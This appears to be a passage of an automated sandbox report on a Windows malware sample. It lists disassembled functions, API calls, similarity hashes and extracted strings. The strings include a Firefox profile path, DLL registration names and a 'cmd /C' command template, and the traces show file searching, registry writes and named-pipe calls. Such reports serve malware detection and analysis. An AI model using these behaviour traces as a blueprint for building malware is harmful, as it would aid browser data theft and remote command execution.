    • Part of subcall function 001C3996: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
  • SetEvent.KERNEL32(00000001,001EB1D0,?,00000000), ref: 001C6C91
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C6D1E
  • RegOpenKeyA.ADVAPI32(80000001,001EC992,?), ref: 001C6D4F
  • RegCloseKey.ADVAPI32(?), ref: 001C6D77
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
    • Part of subcall function 001D9029: NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 001D905A
    • Part of subcall function 001D9029: RtlNtStatusToDosError.NTDLL(C000009A), ref: 001D9095
    • Part of subcall function 001D6D18: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
    • Part of subcall function 001D6D18: GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001D6D18: ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
    • Part of subcall function 001D6D18: GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
    • Part of subcall function 001D6D18: CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
Strings
  • %APPDATA%\Mozilla\Firefox\Profiles, xrefs: 001C6CA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3F95, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80 Total matches: 37memorystring
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4202, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63 Total matches: 53memoryregistry
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9EAA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33 Total matches: 56memorystring
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C59D7, Relevance: 7.6, APIs: 5, Instructions: 83 Total matches: 27memorytime
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
